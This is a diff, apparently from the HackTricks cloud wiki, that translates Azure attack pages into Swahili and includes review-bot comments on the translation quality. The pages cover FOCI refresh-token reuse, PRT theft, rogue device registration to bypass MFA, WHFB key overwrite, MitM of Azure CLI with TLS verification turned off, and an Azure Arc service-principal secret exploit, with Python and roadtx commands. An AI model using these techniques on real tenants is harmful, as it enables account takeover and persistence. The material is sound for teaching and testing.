Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
|
||||
Zaidi ya hayo, kumbuka kwamba FOCI applications ni public applications, hivyo **siri yoyote haitahitajika** kuthibitisha kwenye seva.
|
||||
|
||||
Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
|
||||
Kisha wateja wa FOCI waliotambulika waliripotiwa katika [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) wanaweza [**kupatikana hapa**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
|
||||
|
||||
### Get different scope
|
||||
|
||||
Following with the previous example code, in this code it's requested a new token for a different scope:
|
||||
|
||||
Kufuata mfano wa awali wa msimbo, katika msimbo huu inahitajika token mpya kwa scope tofauti:
|
||||
```python
|
||||
# Code from https://github.com/secureworks/family-of-client-ids-research
|
||||
azure_cli_bearer_tokens_for_outlook_api = (
|
||||
# Same client as original authorization
|
||||
azure_cli_client.acquire_token_by_refresh_token(
|
||||
new_azure_cli_bearer_tokens_for_graph_api.get(
|
||||
"refresh_token"
|
||||
),
|
||||
# But different scopes than original authorization
|
||||
scopes=[
|
||||
"https://outlook.office.com/.default"
|
||||
],
|
||||
)
|
||||
# Same client as original authorization
|
||||
azure_cli_client.acquire_token_by_refresh_token(
|
||||
new_azure_cli_bearer_tokens_for_graph_api.get(
|
||||
"refresh_token"
|
||||
),
|
||||
# But different scopes than original authorization
|
||||
scopes=[
|
||||
"https://outlook.office.com/.default"
|
||||
],
|
||||
)
|
||||
)
|
||||
pprint(azure_cli_bearer_tokens_for_outlook_api)
|
||||
```
|
||||
|
||||
### Get different client and scopes
|
||||
|
||||
### Pata wateja na mipaka tofauti
|
||||
```python
|
||||
# Code from https://github.com/secureworks/family-of-client-ids-research
|
||||
microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
|
||||
microsoft_office_bearer_tokens_for_graph_api = (
|
||||
# This is a different client application than we used in the previous examples
|
||||
microsoft_office_client.acquire_token_by_refresh_token(
|
||||
# But we can use the refresh token issued to our original client application
|
||||
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
|
||||
# And request different scopes too
|
||||
scopes=["https://graph.microsoft.com/.default"],
|
||||
)
|
||||
# This is a different client application than we used in the previous examples
|
||||
microsoft_office_client.acquire_token_by_refresh_token(
|
||||
# But we can use the refresh token issued to our original client application
|
||||
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
|
||||
# And request different scopes too
|
||||
scopes=["https://graph.microsoft.com/.default"],
|
||||
)
|
||||
)
|
||||
# How is this possible?
|
||||
pprint(microsoft_office_bearer_tokens_for_graph_api)
|
||||
```
|
||||
|
||||
## References
|
||||
## Marejeleo
|
||||
|
||||
- [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
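Review bot: the removed/added pairs inside the three ```python fences again differ only in leading whitespace, and for `decode_jwt` that is not harmless: `"""Decodes base64 encoded JWT blob"""` and `return jwt.decode(` are the body of `def decode_jwt(base64_blob: str) -> Dict[str, Any]:`, so if the added version strips their indentation the block raises IndentationError and the example no longer runs. Suggest reverting the whitespace edits in all three code blocks. Also in this hunk: `### Get different client and scopes` is translated to `### Pata wateja na mipaka tofauti` while the sibling heading `### Get different scope` stays in English, and `## References` becomes `## Marejeleo` here although the same heading in the earlier file in this commit is left as `## References`; "mipaka" (boundaries) is used for "scopes" in the heading while the body text keeps "scopes". Keep headings and the scope term consistent across the commit.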
@@ -4,41 +4,38 @@
|
||||
|
||||
## Basic Information
|
||||
|
||||
When a device joins AzureAD a new object is created in AzureAD.
|
||||
Wakati kifaa kinajiunga na AzureAD, kitu kipya kinaundwa katika AzureAD.
|
||||
|
||||
When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
|
||||
Wakati wa kujiandikisha kifaa, **mtumiaji anaombwa kuingia na akaunti yake** (akiulizwa kwa MFA ikiwa inahitajika), kisha inahitaji tokeni za huduma ya usajili wa kifaa na kisha inauliza uthibitisho wa mwisho.
|
||||
|
||||
Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
|
||||
|
||||
Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
|
||||
Kisha, jozi mbili za funguo za RSA zinaundwa katika kifaa: **funguo ya kifaa** (**funguo ya umma**) ambayo inatumwa kwa **AzureAD** na **funguo ya usafirishaji** (**funguo ya faragha**) ambayo inahifadhiwa katika TPM ikiwa inawezekana.
|
||||
|
||||
Kisha, **kitu** kinaundwa katika **AzureAD** (sio katika Intune) na AzureAD inarudisha kwa kifaa **cheti** kilichosainiwa na hiyo. Unaweza kuthibitisha kwamba **kifaa kimejiunga na AzureAD** na taarifa kuhusu **cheti** (kama kimeprotected na TPM).
|
||||
```bash
|
||||
dsregcmd /status
|
||||
```
|
||||
Baada ya usajili wa kifaa, **Primary Refresh Token** inahitajika na moduli ya LSASS CloudAP na inatolewa kwa kifaa. PRT inakuja na **funguo ya kikao iliyosimbwa ili kifaa pekee kiweze kuisambua** (kwa kutumia funguo ya umma ya funguo ya usafirishaji) na **inahitajika ili kutumia PRT.**
|
||||
|
||||
After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
|
||||
|
||||
For more information about what is a PRT check:
|
||||
Kwa maelezo zaidi kuhusu nini PRT ni angalia:
|
||||
|
||||
{{#ref}}
|
||||
az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
|
||||
{{#endref}}
|
||||
|
||||
### TPM - Trusted Platform Module
|
||||
### TPM - Moduli ya Jukwaa Iliyotegemewa
|
||||
|
||||
The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
|
||||
But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
|
||||
**TPM** **inalinda** dhidi ya **uchimbaji** wa funguo kutoka kwa kifaa kilichozimwa (ikiwa kinalindwa na PIN) na kutoka kwa uchimbaji wa nyenzo za faragha kutoka kwenye safu ya OS.\
|
||||
Lakini **haiwezi kulinda** dhidi ya **kuvuta** muunganisho wa kimwili kati ya TPM na CPU au **kutumia nyenzo za kifahari** katika TPM wakati mfumo unafanya kazi kutoka kwa mchakato wenye haki za **SYSTEM**.
|
||||
|
||||
If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
|
||||
Ikiwa utaangalia ukurasa ufuatao utaona kwamba **kuiba PRT** kunaweza kutumika kupata kama **mtumiaji**, ambayo ni nzuri kwa sababu **PRT iko kwenye vifaa**, hivyo inaweza kuibiwa kutoka kwao (au ikiwa haijaibiwa inaweza kutumika vibaya kuunda funguo mpya za kusaini):
|
||||
|
||||
{{#ref}}
|
||||
az-lateral-movement-cloud-on-prem/pass-the-prt.md
|
||||
{{#endref}}
|
||||
|
||||
## Registering a device with SSO tokens
|
||||
|
||||
It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
|
||||
## Kusajili kifaa na tokeni za SSO
|
||||
|
||||
Itakuwa inawezekana kwa mshambuliaji kuomba tokeni kwa huduma ya usajili wa kifaa ya Microsoft kutoka kwa kifaa kilichovunjwa na kukisajili:
|
||||
```bash
|
||||
# Initialize SSO flow
|
||||
roadrecon auth prt-init
|
||||
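Review bot: the translated TPM paragraph renders "using the cryptographic material in the TPM" as `kutumia nyenzo za kifahari katika TPM`, and `kifahari` means luxury goods; it should read `nyenzo za kriptografia` (or keep the English term). In the same hunk the certificate sentence leaves `kimeprotected` half-translated (`kama kimeprotected na TPM`); `kama kimelindwa na TPM` keeps it in Swahili. A smaller point: `kitu` for the AzureAD "object" (`kitu kipya kinaundwa katika AzureAD`) is the everyday word for "thing", and the directory-object sense is clearer as `kitu cha AzureAD` or by keeping `object` as a term, as the page already does for PRT, TPM and LSASS.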
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
|
||||
# Custom pyhton script to register a device (check roadtx)
|
||||
registerdevice.py
|
||||
```
|
||||
|
||||
Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
|
||||
Which will give you a **cheti ambacho unaweza kutumia kuomba PRTs katika siku zijazo**. Hivyo kudumisha kudumu na **kuzidi MFA** kwa sababu token ya PRT ya awali iliyotumika kujiandikisha kifaa kipya **ilikuwa tayari na ruhusa za MFA zilizotolewa**.
|
||||
|
||||
> [!TIP]
|
||||
> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
|
||||
> Kumbuka kwamba ili kufanya shambulio hili utahitaji ruhusa za **kujiandikisha vifaa vipya**. Pia, kujiandikisha kifaa hakumaanishi kifaa kitakuwa **kimekubaliwa kujiunga na Intune**.
|
||||
|
||||
> [!CAUTION]
|
||||
> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
|
||||
> Shambulio hili lilirekebishwa mnamo Septemba 2021 kwani huwezi tena kujiandikisha vifaa vipya kwa kutumia token za SSO. Hata hivyo, bado inawezekana kujiandikisha vifaa kwa njia halali (ikiwa na jina la mtumiaji, nenosiri na MFA ikiwa inahitajika). Angalia: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
|
||||
|
||||
## Overwriting a device ticket
|
||||
## Kuandika upya tiketi ya kifaa
|
||||
|
||||
It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
|
||||
Ilikuwa inawezekana **kuomba tiketi ya kifaa**, **kuandika upya** ile ya sasa ya kifaa, na wakati wa mchakato **kuiiba PRT** (hivyo hakuna haja ya kuiba kutoka kwa TPM. Kwa maelezo zaidi [**angalia mazungumzo haya**](https://youtu.be/BduCn8cLV1A).
|
||||
|
||||
<figure><img src="../../images/image (32).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
> [!CAUTION]
|
||||
> However, this was fixed.
|
||||
> Hata hivyo, hili lilirekebishwa.
|
||||
|
||||
## Overwrite WHFB key
|
||||
## Andika upya funguo za WHFB
|
||||
|
||||
[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
|
||||
[**Angalia slaidi za asili hapa**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
|
||||
|
||||
Attack summary:
|
||||
Muhtasari wa shambulio:
|
||||
|
||||
- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
|
||||
- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
|
||||
- This also provides **persistence**
|
||||
- Inawezekana **kuandika upya** funguo za **WHFB** zilizoregistriwa kutoka kwa **kifaa** kupitia SSO
|
||||
- In **shinda ulinzi wa TPM** kwani funguo inachukuliwa **wakati wa uzalishaji** wa funguo mpya
|
||||
- Hii pia inatoa **kudumu**
|
||||
|
||||
<figure><img src="../../images/image (34).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
|
||||
|
||||
Then, it's possible to generate a new key with:
|
||||
Watumiaji wanaweza kubadilisha mali yao ya searchableDeviceKey kupitia Azure AD Graph, hata hivyo, mshambuliaji anahitaji kuwa na kifaa katika mpangilio (kilichoregistriwa kwa haraka au akiwa na cheti + funguo iliyopatikana kutoka kwa kifaa halali) na token ya ufikiaji halali kwa AAD Graph.
|
||||
|
||||
Kisha, inawezekana kuzalisha funguo mpya na:
|
||||
```bash
|
||||
roadtx genhellokey -d <device id> -k tempkey.key
|
||||
```
|
||||
|
||||
and then PATCH the information of the searchableDeviceKey:
|
||||
na kisha PATCH taarifa za searchableDeviceKey:
|
||||
|
||||
<figure><img src="../../images/image (36).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
|
||||
Inawezekana kupata token ya ufikiaji kutoka kwa mtumiaji kupitia **device code phishing** na kutumia hatua zilizopita ili **kuiba ufikiaji wake**. Kwa maelezo zaidi angalia:
|
||||
|
||||
{{#ref}}
|
||||
az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
|
||||
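Review bot: the added line `Which will give you a **cheti ambacho unaweza kutumia kuomba PRTs katika siku zijazo**` still opens with untranslated English; start it with `Hii itakupa` so the sentence is wholly in Swahili. Likewise the WHFB bullet `- In **shinda ulinzi wa TPM** ...` keeps a stray English `In` where `Ina` (it defeats) is meant, and `kilichoregistriwa` / `zilizoregistriwa` are anglicisms for `kilichosajiliwa` / `zilizosajiliwa`, which the hunk's own heading `## Kusajili kifaa na tokeni za SSO` already uses. In the unchanged context, `# Custom pyhton script` should read `python`.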
@@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
|
||||
|
||||
<figure><img src="../../images/image (37).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## References
|
||||
## Marejeo
|
||||
|
||||
- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
|
||||
- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
|
||||
- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
## Install PowerShell in Linux
|
||||
|
||||
> [!TIP]
|
||||
> In linux you will need to install PowerShell Core:
|
||||
> Katika linux utahitaji kufunga PowerShell Core:
|
||||
>
|
||||
> ```bash
|
||||
> sudo apt-get update
|
||||
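Review bot: `> Katika linux utahitaji kufunga PowerShell Core:` uses `kufunga`, which means to close, lock or fasten; "install" is `kusakinisha`, the verb the macOS section of the next hunk already uses (`Sakinisha toleo la hivi punde la PowerShell`). The same fix applies to `1. Funga brew` there.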
@@ -28,56 +28,45 @@
|
||||
|
||||
## Install PowerShell in MacOS
|
||||
|
||||
Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
|
||||
|
||||
1. Install `brew` if not installed yet:
|
||||
Maelekezo kutoka [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
|
||||
|
||||
1. Funga `brew` ikiwa haijafungwa bado:
|
||||
```bash
|
||||
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
|
||||
```
|
||||
|
||||
2. Install the latest stable release of PowerShell:
|
||||
|
||||
2. Sakinisha toleo la hivi punde la PowerShell:
|
||||
```sh
|
||||
brew install powershell/tap/powershell
|
||||
```
|
||||
|
||||
3. Run PowerShell:
|
||||
|
||||
3. Kimbia PowerShell:
|
||||
```sh
|
||||
pwsh
|
||||
```
|
||||
|
||||
4. Update:
|
||||
|
||||
4. Sasisho:
|
||||
```sh
|
||||
brew update
|
||||
brew upgrade powershell
|
||||
```
|
||||
|
||||
## Main Enumeration Tools
|
||||
|
||||
### az cli
|
||||
|
||||
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
|
||||
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) ni chombo cha kuvuka majukwaa kilichoandikwa kwa Python kwa ajili ya kusimamia na kuendesha (zaidi ya) rasilimali za Azure na Entra ID. Kinajihusisha na Azure na kutekeleza amri za usimamizi kupitia mstari wa amri au skripti.
|
||||
|
||||
Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
|
||||
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
|
||||
|
||||
Commands in Azure CLI are structured using a pattern of: `az <service> <action> <parameters>`
|
||||
Amri katika Azure CLI zimejengwa kwa kutumia muundo wa: `az <service> <action> <parameters>`
|
||||
|
||||
#### Debug | MitM az cli
|
||||
|
||||
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
|
||||
|
||||
Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo **`az`** kinatuma:
|
||||
```bash
|
||||
az account management-group list --output table --debug
|
||||
```
|
||||
|
||||
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
|
||||
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="Bash" }}
|
||||
|
||||
```bash
|
||||
export ADAL_PYTHON_SSL_NO_VERIFY=1
|
||||
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
|
||||
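Review bot: step 3 of the macOS list is translated as `3. Kimbia PowerShell:`; `kimbia` is "run" in the sense of running away, and the verb for executing a program is `Endesha` (`3. Endesha PowerShell:`). Step 4 `4. Sasisho:` is the noun "an update" where the imperative `Sasisha` fits the other steps, and step 2 drops "stable" (`toleo thabiti la hivi punde`). In the az cli paragraph `(zaidi ya)` means "more than", whereas "(most)" is `(nyingi ya)`. The stray `¡` inside the link text `[**maelekezo ya usakinishaji¡**]` is carried over from the English source line `[**installation instructions¡**]` and should be removed in both.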
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080"
|
||||
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
|
||||
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
|
||||
{{#tab name="PS" }}
|
||||
|
||||
```bash
|
||||
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
|
||||
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
|
||||
$env:HTTPS_PROXY="http://127.0.0.1:8080"
|
||||
$env:HTTP_PROXY="http://127.0.0.1:8080"
|
||||
```
|
||||
|
||||
{{#endtab }}
|
||||
{{#endtabs }}
|
||||
|
||||
### Az PowerShell
|
||||
|
||||
Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
|
||||
Azure PowerShell ni moduli yenye cmdlets za kusimamia rasilimali za Azure moja kwa moja kutoka kwenye mstari wa amri wa PowerShell.
|
||||
|
||||
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
|
||||
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
|
||||
|
||||
Commands in Azure PowerShell AZ Module are structured like: `<Action>-Az<Service> <parameters>`
|
||||
Amri katika Moduli ya Azure PowerShell AZ zimeundwa kama: `<Action>-Az<Service> <parameters>`
|
||||
|
||||
#### Debug | MitM Az PowerShell
|
||||
|
||||
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
|
||||
|
||||
Kwa kutumia parameter **`-Debug`** inawezekana kuona maombi yote ambayo chombo kinatuma:
|
||||
```bash
|
||||
Get-AzResourceGroup -Debug
|
||||
```
|
||||
|
||||
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
|
||||
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kuweka mabadiliko ya mazingira `HTTPS_PROXY` na `HTTP_PROXY` kulingana na [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
|
||||
|
||||
### Microsoft Graph PowerShell
|
||||
|
||||
Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
|
||||
Microsoft Graph PowerShell ni SDK ya jukwaa nyingi inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, vitambulisho vya nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini kabisa, inahakikisha shughuli salama na inapokea masasisho ya mara kwa mara ili kuendana na vipengele vya hivi karibuni vya Microsoft Graph API.
|
||||
|
||||
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
|
||||
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
|
||||
|
||||
Commands in Microsoft Graph PowerShell are structured like: `<Action>-Mg<Service> <parameters>`
|
||||
Amri katika Microsoft Graph PowerShell zimejengwa kama: `<Action>-Mg<Service> <parameters>`
|
||||
|
||||
#### Debug Microsoft Graph PowerShell
|
||||
|
||||
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
|
||||
|
||||
Kwa kutumia parameter **`-Debug`** inawezekana kuona maombi yote ambayo zana inatuma:
|
||||
```bash
|
||||
Get-MgUser -Debug
|
||||
```
|
||||
|
||||
### ~~**AzureAD Powershell**~~
|
||||
|
||||
The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
|
||||
Moduli ya Azure Active Directory (AD), sasa **imeondolewa**, ni sehemu ya Azure PowerShell kwa ajili ya kusimamia rasilimali za Azure AD. Inatoa cmdlets kwa kazi kama kusimamia watumiaji, vikundi, na usajili wa programu katika Entra ID.
|
||||
|
||||
> [!TIP]
|
||||
> This is replaced by Microsoft Graph PowerShell
|
||||
|
||||
Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
|
||||
|
||||
|
||||
|
||||
> Hii imebadilishwa na Microsoft Graph PowerShell
|
||||
|
||||
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://www.powershellgallery.com/packages/AzureAD).
|
||||
|
||||
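Review bot: in the Az PowerShell MitM paragraph `unaweza kuweka mabadiliko ya mazingira` says "you can set environmental changes"; environment variables are `vigezo vya mazingira`, so `unaweza kuweka vigezo vya mazingira HTTPS_PROXY na HTTP_PROXY`. Unrelated to the translation but visible in this hunk's unchanged context: the `{{#tab name="PS" }}` block opens its fence tagged `bash` although the body is PowerShell (`$env:HTTPS_PROXY="http://127.0.0.1:8080"`), and the `Get-AzResourceGroup -Debug` and `Get-MgUser -Debug` blocks are fenced as `bash` too; tagging them `powershell` fixes the highlighting. Also, `ufikiaji wa chini kabisa` for "least privilege access" reads as "lowest access"; `ufikiaji wa ruhusa ndogo kabisa` (or the English term) conveys the privilege sense.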
@@ -2,19 +2,18 @@
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
### Identifying the Issues
|
||||
### Kutambua Masuala
|
||||
|
||||
Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
|
||||
Azure Arc inaruhusu kuunganishwa kwa seva mpya za ndani (seva zilizounganishwa kwenye kikoa) ndani ya Azure Arc kwa kutumia mbinu ya Group Policy Object. Ili kuwezesha hili, Microsoft inatoa zana ya kutekeleza inayohitajika kwa ajili ya kuanzisha mchakato wa kuingiza. Ndani ya faili ya ArcEnableServerGroupPolicy.zip, skripti zifuatazo zinaweza kupatikana: DeployGPO.ps1, EnableAzureArc.ps1, na AzureArcDeployment.psm1.
|
||||
|
||||
When executed, the DeployGPO.ps1 script performs the following actions:
|
||||
Wakati inatekelezwa, skripti ya DeployGPO.ps1 inafanya hatua zifuatazo:
|
||||
|
||||
1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
|
||||
2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
|
||||
1. Inaunda Azure Arc Servers Onboarding GPO ndani ya kikoa cha ndani.
|
||||
2. Inakopya skripti ya kuingiza ya EnableAzureArc.ps1 kwenye sehemu ya mtandao iliyotengwa kwa ajili ya mchakato wa kuingiza, ambayo pia ina pakiti ya kusakinisha ya Windows.
|
||||
|
||||
When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
|
||||
|
||||
An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
|
||||
Wakati wa kuendesha skripti hii, wasimamizi wa mfumo wanahitaji kutoa vigezo viwili vikuu: **ServicePrincipalId** na **ServicePrincipalClientSecret**. Aidha, inahitaji vigezo vingine kama vile kikoa, FQDN ya seva inayohifadhi sehemu hiyo, na jina la sehemu hiyo. Maelezo zaidi kama vile kitambulisho cha mpangaji, kundi la rasilimali, na taarifa nyingine muhimu lazima pia zipewe skripti.
|
||||
|
||||
Siri iliyosimbwa inaundwa katika saraka ya AzureArcDeploy kwenye sehemu iliyotajwa kwa kutumia usimbaji wa DPAPI-NG. Siri iliyosimbwa inahifadhiwa katika faili inayoitwa encryptedServicePrincipalSecret. Ushahidi wa hili unaweza kupatikana katika skripti ya DeployGPO.ps1, ambapo usimbaji unafanywa kwa kuita ProtectBase64 na $descriptor na $ServicePrincipalSecret kama ingizo. Maelezo ya descriptor yanajumuisha SID za Kundi la Kompyuta za Kikoa na Kundi la Wakala wa Kikoa, kuhakikisha kwamba ServicePrincipalSecret inaweza kusimbwa tu na Vikundi vya Usalama vya Wakala wa Kikoa na Kompyuta za Kikoa, kama ilivyotajwa katika maoni ya skripti.
|
||||
```powershell
|
||||
# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
|
||||
$DomainComputersSID = "SID=" + $DomainComputersSID
|
||||
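Review bot: the translated DPAPI-NG paragraph inverts the security claim: `ServicePrincipalSecret inaweza kusimbwa tu na Vikundi vya Usalama vya Wakala wa Kikoa na Kompyuta za Kikoa` says the secret can only be *encrypted* by those groups, whereas the English states it can only be *decrypted* by them (`kusimbuliwa` / `kufunguliwa`). In the same sentence `Wakala wa Kikoa` means "domain agents"; "Domain Controllers" is `Vidhibiti vya Kikoa`, or keep the English term since the script comment that follows (`# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers ...`) uses it. The encrypt/decrypt distinction is the whole point of the finding, so this line should be corrected before merge.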
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
|
||||
Import-Module $PSScriptRoot\AzureArcDeployment.psm1
|
||||
$encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
|
||||
```
|
||||
|
||||
### Exploit
|
||||
|
||||
We have the follow conditions:
|
||||
Tuna masharti yafuatayo:
|
||||
|
||||
1. We have successfully penetrated the internal network.
|
||||
2. We have the capability to create or assume control of a computer account within Active Directory.
|
||||
3. We have discovered a network share containing the AzureArcDeploy directory.
|
||||
|
||||
There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
|
||||
1. Tumefanikiwa kuingia kwenye mtandao wa ndani.
|
||||
2. Tuna uwezo wa kuunda au kudhibiti akaunti ya kompyuta ndani ya Active Directory.
|
||||
3. Tumegundua sehemu ya mtandao inayoshikilia saraka ya AzureArcDeploy.
|
||||
|
||||
